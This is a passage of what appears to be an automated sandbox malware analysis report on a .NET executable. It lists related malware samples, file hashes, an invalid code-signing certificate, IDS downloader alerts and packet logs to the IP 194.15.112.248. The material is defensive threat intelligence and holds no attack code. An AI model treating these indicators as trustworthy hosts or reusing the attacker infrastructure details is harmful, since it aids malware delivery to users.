                                          • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                          Warnings

                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                          • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.12.23.50
                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, fe3cr.delivery.mp.microsoft.com
                                          • Execution Graph export aborted for target MWP0FO5rAF.exe, PID 7596 because it is empty
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Report size getting too big, too many NtReadVirtualMemory calls found.

                                          Simulations

                                          Behavior and APIs

                                          No simulations

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          194.15.112.248IMG_10503677.exeGet hashmaliciousMassLogger RATBrowse
                                            Ref#103052.exeGet hashmaliciousXWormBrowse
                                              9876567899.bat.exeGet hashmaliciousLokibotBrowse
                                                Ref_31020563.exeGet hashmaliciousUnknownBrowse
                                                  Ref#116670.exeGet hashmaliciousMassLogger RATBrowse
                                                    Ref#60031796.exeGet hashmaliciousAgentTeslaBrowse
                                                      Ref#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                        KyrazonSetup.exeGet hashmaliciousUnknownBrowse
                                                          KyrazonSetup.exeGet hashmaliciousUnknownBrowse

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            oshi.atGhwFStoMJX.exeGet hashmaliciousUnknownBrowse
                                                            • 5.253.86.15
                                                            GhwFStoMJX.exeGet hashmaliciousUnknownBrowse
                                                            • 5.253.86.15
                                                            IMG_10503677.exeGet hashmaliciousMassLogger RATBrowse
                                                            • 194.15.112.248
                                                            IMG_10503677.exeGet hashmaliciousUnknownBrowse
                                                            • 5.253.86.15
                                                            Holiday#3021.exeGet hashmaliciousUnknownBrowse
                                                            • 5.253.86.15
                                                            Holiday#3021.exeGet hashmaliciousUnknownBrowse
                                                            • 5.253.86.15
                                                            Ref#103052.exeGet hashmaliciousXWormBrowse
                                                            • 194.15.112.248
                                                            Ref#103052.exeGet hashmaliciousUnknownBrowse
                                                            • 5.253.86.15
                                                            9876567899.bat.exeGet hashmaliciousLokibotBrowse
                                                            • 194.15.112.248

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            INTERNATIONAL-HOSTING-SOLUTIONS-ASEUDCrouteGBIMG_10503677.exeGet hashmaliciousMassLogger RATBrowse
                                                            • 194.15.112.248
                                                            Ref#103052.exeGet hashmaliciousXWormBrowse
                                                            • 194.15.112.248
                                                            9876567899.bat.exeGet hashmaliciousLokibotBrowse
                                                            • 194.15.112.248
                                                            Ref_31020563.exeGet hashmaliciousUnknownBrowse
                                                            • 194.15.112.248
                                                            Ref#116670.exeGet hashmaliciousMassLogger RATBrowse
                                                            • 194.15.112.248
                                                            Ref#60031796.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 194.15.112.248
                                                            Ref#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 194.15.112.248
                                                            KyrazonSetup.exeGet hashmaliciousUnknownBrowse
                                                            • 194.15.112.248
                                                            KyrazonSetup.exeGet hashmaliciousUnknownBrowse
                                                            • 194.15.112.248

                                                            JA3 Fingerprints

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            3b5074b1b5d032e5620f69f9f700ff0eAHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 194.15.112.248
                                                            eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                            • 194.15.112.248
                                                            grW5hyK960.exeGet hashmaliciousUnknownBrowse
                                                            • 194.15.112.248
                                                            MzqLQjCwrw.exeGet hashmaliciousMassLogger RATBrowse
                                                            • 194.15.112.248
                                                            grW5hyK960.exeGet hashmaliciousUnknownBrowse
                                                            • 194.15.112.248
                                                            r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                            • 194.15.112.248
                                                            RmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 194.15.112.248
                                                            IUqsn1SBGy.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 194.15.112.248
                                                            8nkdC8daWi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 194.15.112.248

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            No created / dropped files found

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):5.036908290750075
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                            • Win32 Executable (generic) a (10002005/4) 49.97%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            • DOS Executable Generic (2002/1) 0.01%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:MWP0FO5rAF.exe
                                                            File size:1'072'096 bytes
                                                            MD5:79e059e518b08adbf428180b3e05495e
                                                            SHA1:53dec3a16758aeb96a1afce4245b26c56d53d40a
                                                            SHA256:f55861fdfab03622d2e522711b19b3edfa6d50906ab712cfae0810639205b0ce
                                                            SHA512:ea2cf8b54c29f83cd49d997a849bc4c1ad264738a7e353450f361cbb086febb317065607d0ef97d921d701632f4c8f88247e7b27681bd5ee73c58d6735a2133e
                                                            SSDEEP:12288:q5WKZq9ivLuQrN7QYzm7GfnKt8AmKCwTNeCSlyF1TdQL0q82gev0oOKHGTLu3p/s:xWKMKNRGQPhnklmiA
                                                            TLSH:9C350E67798EA7B0E2007B33D9975C988391FE47371BC21B398B375E28167BE8941607
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...3.bg.....................J......N.... ... ....@.. ....................................`................................

                                                            File Icon

                                                            Icon Hash:27d8dcd6d4d85007

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x50114e
                                                            Entrypoint Section:.text
                                                            Digitally signed:true
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x67620C33 [Tue Dec 17 23:41:39 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                            Authenticode Signature

                                                            Signature Valid:false
                                                            Signature Issuer:CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
                                                            Signature Validation Error:The digital signature of the object did not verify
                                                            Error Number:-2146869232
                                                            Not Before, Not After
                                                            • 04/07/2024 05:35:32 15/05/2027 16:15:04
                                                            Subject Chain
                                                            • OID.1.3.6.1.4.1.311.60.2.1.3=VN, OID.2.5.4.15=Private Organization, CN="DUC FABULOUS CO.,LTD", SERIALNUMBER=0105838409, O="DUC FABULOUS CO.,LTD", L=Hanoi, C=VN
                                                            Version:3
                                                            Thumbprint MD5:FF0E889D2A73C3A679605952D35452DC
                                                            Thumbprint SHA-1:2C1D12F8BBE0827400A8440AF74FFFA8DCC8097C
                                                            Thumbprint SHA-256:A73352D67693AA16BCE2F182B15891F0F23EA0485CC18938686AAFDEE7B743E3
                                                            Serial:6DD2E3173995F51BFAC1D9FB4CB200C1

                                                            Entrypoint Preview

                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x1011000x4b.text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x1020000x4660.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x103e000x1de0.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x1080000xc.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x20000xff1540xff200a1ed6360ea9b98d854b70ba5bd351cadFalse0.38527089202596765data5.009681012477672IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rsrc0x1020000x46600x4800a705be67d99cc110d1062f2357d64091False0.06125217013888889data2.4638252727598347IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0x1080000xc0x20072f19fce66f0fb7eca718f0a5e428c32False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_ICON0x1021300x4028Device independent bitmap graphic, 64 x 128 x 32, image size 00.02368485143692158
                                                            RT_GROUP_ICON0x1061580x14data1.05
                                                            RT_VERSION0x10616c0x308data0.4497422680412371
                                                            RT_MANIFEST0x1064740x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                            Imports

                                                            DLLImport
                                                            mscoree.dll_CorExeMain

                                                            Network Behavior

                                                            Suricata IDS Alerts

                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2025-01-10T18:56:45.262942+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949756194.15.112.248443TCP
                                                            2025-01-10T18:56:47.750226+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949768194.15.112.248443TCP
                                                            2025-01-10T18:56:49.563677+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949782194.15.112.248443TCP
                                                            2025-01-10T18:56:51.472596+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949793194.15.112.248443TCP
                                                            2025-01-10T18:56:54.066444+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949804194.15.112.248443TCP
                                                            2025-01-10T18:57:04.976537+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949818194.15.112.248443TCP
                                                            2025-01-10T18:57:07.198274+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949870194.15.112.248443TCP
                                                            2025-01-10T18:57:09.070685+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949882194.15.112.248443TCP
                                                            2025-01-10T18:57:14.387559+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949890194.15.112.248443TCP
                                                            2025-01-10T18:57:16.475156+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949918194.15.112.248443TCP
                                                            2025-01-10T18:57:18.321316+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949929194.15.112.248443TCP
                                                            2025-01-10T18:57:20.678591+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949940194.15.112.248443TCP
                                                            2025-01-10T18:57:23.008507+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949956194.15.112.248443TCP
                                                            2025-01-10T18:57:26.260261+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949969194.15.112.248443TCP
                                                            2025-01-10T18:57:28.212441+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949987194.15.112.248443TCP
                                                            2025-01-10T18:57:30.055033+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949994194.15.112.248443TCP
                                                            2025-01-10T18:57:31.880936+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949995194.15.112.248443TCP
                                                            2025-01-10T18:57:33.707657+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949996194.15.112.248443TCP
                                                            2025-01-10T18:57:35.545267+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949998194.15.112.248443TCP
                                                            2025-01-10T18:57:37.368038+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949999194.15.112.248443TCP
                                                            2025-01-10T18:57:39.204465+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950000194.15.112.248443TCP
                                                            2025-01-10T18:57:41.155816+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950001194.15.112.248443TCP
                                                            2025-01-10T18:57:42.991357+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950002194.15.112.248443TCP
                                                            2025-01-10T18:57:47.943872+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950003194.15.112.248443TCP
                                                            2025-01-10T18:57:49.763923+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950004194.15.112.248443TCP
                                                            2025-01-10T18:57:51.709021+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950005194.15.112.248443TCP
                                                            2025-01-10T18:57:54.004270+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950006194.15.112.248443TCP
                                                            2025-01-10T18:57:56.279079+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950007194.15.112.248443TCP
                                                            2025-01-10T18:57:58.182221+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950008194.15.112.248443TCP
                                                            2025-01-10T18:58:03.357723+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950009194.15.112.248443TCP
                                                            2025-01-10T18:58:05.352484+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950010194.15.112.248443TCP
                                                            2025-01-10T18:58:08.400228+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950011194.15.112.248443TCP
                                                            2025-01-10T18:58:11.363145+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950012194.15.112.248443TCP
                                                            2025-01-10T18:58:13.298190+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950013194.15.112.248443TCP
                                                            2025-01-10T18:58:15.369583+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950014194.15.112.248443TCP
                                                            2025-01-10T18:58:17.259067+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950015194.15.112.248443TCP
                                                            2025-01-10T18:58:19.820500+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950016194.15.112.248443TCP
                                                            2025-01-10T18:58:21.892570+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950017194.15.112.248443TCP
                                                            2025-01-10T18:58:23.831966+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950018194.15.112.248443TCP
                                                            2025-01-10T18:58:26.700254+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950019194.15.112.248443TCP
                                                            2025-01-10T18:58:28.806028+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950020194.15.112.248443TCP
                                                            2025-01-10T18:58:30.761381+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950021194.15.112.248443TCP
                                                            2025-01-10T18:58:35.672634+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950022194.15.112.248443TCP
                                                            2025-01-10T18:58:37.672175+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950023194.15.112.248443TCP
                                                            2025-01-10T18:58:40.462595+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950024194.15.112.248443TCP
                                                            2025-01-10T18:58:42.473049+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950025194.15.112.248443TCP
                                                            2025-01-10T18:58:44.761698+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950026194.15.112.248443TCP
                                                            2025-01-10T18:58:46.559473+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950027194.15.112.248443TCP
                                                            2025-01-10T18:58:48.936705+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950028194.15.112.248443TCP
                                                            2025-01-10T18:58:51.239069+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950029194.15.112.248443TCP
                                                            2025-01-10T18:58:52.997735+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950030194.15.112.248443TCP
                                                            2025-01-10T18:58:54.802096+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950031194.15.112.248443TCP
                                                            2025-01-10T18:58:56.547736+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950032194.15.112.248443TCP
                                                            2025-01-10T18:58:59.233948+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950033194.15.112.248443TCP
                                                            2025-01-10T18:59:01.075346+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950034194.15.112.248443TCP
                                                            2025-01-10T18:59:04.968882+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950035194.15.112.248443TCP
                                                            2025-01-10T18:59:06.742406+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950036194.15.112.248443TCP
                                                            2025-01-10T18:59:08.519975+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950037194.15.112.248443TCP
                                                            2025-01-10T18:59:10.285871+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950038194.15.112.248443TCP
                                                            2025-01-10T18:59:15.112614+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950039194.15.112.248443TCP
                                                            2025-01-10T18:59:16.869776+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950040194.15.112.248443TCP
                                                            2025-01-10T18:59:18.744880+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950041194.15.112.248443TCP
                                                            2025-01-10T18:59:20.555289+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950042194.15.112.248443TCP
                                                            2025-01-10T18:59:22.282448+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950043194.15.112.248443TCP
                                                            2025-01-10T18:59:24.055772+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950044194.15.112.248443TCP
                                                            2025-01-10T18:59:26.034374+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950045194.15.112.248443TCP
                                                            2025-01-10T18:59:28.936967+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950046194.15.112.248443TCP
                                                            2025-01-10T18:59:30.692547+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950047194.15.112.248443TCP
                                                            2025-01-10T18:59:32.461967+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950048194.15.112.248443TCP
                                                            2025-01-10T18:59:34.373241+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950049194.15.112.248443TCP
                                                            2025-01-10T18:59:36.192047+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950050194.15.112.248443TCP
                                                            2025-01-10T18:59:38.207078+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950051194.15.112.248443TCP
                                                            2025-01-10T18:59:40.094785+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950052194.15.112.248443TCP
                                                            2025-01-10T18:59:42.129700+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950053194.15.112.248443TCP
                                                            2025-01-10T18:59:43.967484+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950054194.15.112.248443TCP
                                                            2025-01-10T18:59:45.905840+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.950055194.15.112.248443TCP

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Jan 10, 2025 18:56:40.376784086 CET49743443192.168.2.9194.15.112.248
                                                            Jan 10, 2025 18:56:40.376805067 CET44349743194.15.112.248192.168.2.9
                                                            Jan 10, 2025 18:56:40.376898050 CET49743443192.168.2.9194.15.112.248
                                                            Jan 10, 2025 18:56:40.394967079 CET49743443192.168.2.9194.15.112.248
                                                            Jan 10, 2025 18:56:40.394977093 CET44349743194.15.112.248192.168.2.9
                                                            Jan 10, 2025 18:56:41.762125015 CET44349743194.15.112.248192.168.2.9
                                                            Jan 10, 2025 18:56:41.762227058 CET49743443192.168.2.9194.15.112.248
                                                            Jan 10, 2025 18:56:41.771735907 CET49743443192.168.2.9194.15.112.248
                                                            Jan 10, 2025 18:56:41.771744967 CET44349743194.15.112.248192.168.2.9
                                                            Jan 10, 2025 18:56:41.771987915 CET44349743194.15.112.248192.168.2.9
                                                            Jan 10, 2025 18:56:41.821357012 CET49743443192.168.2.9194.15.112.248
                                                            Jan 10, 2025 18:56:42.327380896 CET49743443192.168.2.9194.15.112.248
                                                            Jan 10, 2025 18:56:42.371320963 CET44349743194.15.112.248192.168.2.9
                                                            Jan 10, 2025 18:56:42.888323069 CET44349743194.15.112.248192.168.2.9
                                                            Jan 10, 2025 18:56:42.888349056 CET44349743194.15.112.248192.168.2.9
                                                            Jan 10, 2025 18:56:42.888396025 CET49743443192.168.2.9194.15.112.248
                                                            Jan 10, 2025 18:56:42.888411999 CET44349743194.15.112.248192.168.2.9
                                                            Jan 10, 2025 18:56:42.888448000 CET49743443192.168.2.9194.15.112.248
                                                            Jan 10, 2025 18:56:42.900851965 CET49743443192.168.2.9194.15.112.248
                                                            Jan 10, 2025 18:56:42.905908108 CET49756443192.168.2.9194.15.112.248
                                                            Jan 10, 2025 18:56:42.905937910 CET44349756194.15.112.248192.168.2.9
                                                            Jan 10, 2025 18:56:42.905997038 CET49756443192.168.2.9194.15.112.248
                                                            Jan 10, 2025 18:56:42.906248093 CET49756443192.168.2.9194.15.112.248
                                                            Jan 10, 2025 18:56:42.906255960 CET44349756194.15.112.248192.168.2.9
                                                            Jan 10, 2025 18:56:44.583870888 CET44349756194.15.112.248192.168.2.9
                                                            Jan 10, 2025 18:56:44.613621950 CET49756443192.168.2.9194.15.112.248
                                                            Jan 10, 2025 18:56:44.613660097 CET44349756194.15.112.248192.168.2.9
                                                            Jan 10, 2025 18:56:45.263052940 CET44349756194.15.112.248192.168.2.9
                                                            Jan 10, 2025 18:56:45.263108969 CET44349756194.15.112.248192.168.2.9
                                                            Jan 10, 2025 18:56:45.263168097 CET49756443192.168.2.9194.15.112.248
                                                            Jan 10, 2025 18:56:45.263220072 CET44349756194.15.112.248192.168.2.9
                                                            Jan 10, 2025 18:56:45.263253927 CET44349756194.15.112.248192.168.2.9
                                                            Jan 10, 2025 18:56:45.263303995 CET49756443192.168.2.9194.15.112.248
                                                            Jan 10, 2025 18:56:45.263642073 CET49756443192.168.2.9194.15.112.248
                                                            Jan 10, 2025 18:56:45.264204025 CET49768443192.168.2.9194.15.112.248
                                                            Jan 10, 2025 18:56:45.264236927 CET44349768194.15.112.248192.168.2.9
                                                            Jan 10, 2025 18:56:45.264426947 CET49768443192.168.2.9194.15.112.248
                                                            Jan 10, 2025 18:56:45.264564037 CET49768443192.168.2.9194.15.112.248
                                                            Jan 10, 2025 18:56:45.264580011 CET44349768194.15.112.248192.168.2.9
                                                            Jan 10, 2025 18:56:46.544620037 CET44349768194.15.112.248192.168.2.9
                                                            Jan 10, 2025 18:56:46.546231031 CET49768443192.168.2.9194.15.112.248
                                                            Jan 10, 2025 18:56:46.546264887 CET44349768194.15.112.248192.168.2.9
                                                            Jan 10, 2025 18:56:47.750341892 CET44349768194.15.112.248192.168.2.9
                                                            Jan 10, 2025 18:56:47.750399113 CET44349768194.15.112.248192.168.2.9
                                                            Jan 10, 2025 18:56:47.750531912 CET44349768194.15.112.248192.168.2.9
                                                            Jan 10, 2025 18:56:47.750643015 CET49768443192.168.2.9194.15.112.248
                                                            Jan 10, 2025 18:56:47.750643015 CET49768443192.168.2.9194.15.112.248
                                                            Jan 10, 2025 18:56:47.757595062 CET49768443192.168.2.9194.15.112.248
                                                            Jan 10, 2025 18:56:47.765103102 CET49782443192.168.2.9194.15.112.248
                                                            Jan 10, 2025 18:56:47.765130043 CET44349782194.15.112.248192.168.2.9
                                                            Jan 10, 2025 18:56:47.765297890 CET49782443192.168.2.9194.15.112.248
                                                            Jan 10, 2025 18:56:47.769205093 CET49782443192.168.2.9194.15.112.248
                                                            Jan 10, 2025 18:56:47.769220114 CET44349782194.15.112.248192.168.2.9
                                                            Jan 10, 2025 18:56:48.971225977 CET44349782194.15.112.248192.168.2.9
                                                            Jan 10, 2025 18:56:48.972897053 CET49782443192.168.2.9194.15.112.248
                                                            Jan 10, 2025 18:56:48.972910881 CET44349782194.15.112.248192.168.2.9
                                                            Jan 10, 2025 18:56:49.563688040 CET44349782194.15.112.248192.168.2.9
                                                            Jan 10, 2025 18:56:49.563713074 CET44349782194.15.112.248192.168.2.9
                                                            Jan 10, 2025 18:56:49.563770056 CET44349782194.15.112.248192.168.2.9
                                                            Jan 10, 2025 18:56:49.563805103 CET49782443192.168.2.9194.15.112.248
                                                            Jan 10, 2025 18:56:49.563805103 CET49782443192.168.2.9194.15.112.248
                                                            Jan 10, 2025 18:56:49.564435005 CET49782443192.168.2.9194.15.112.248
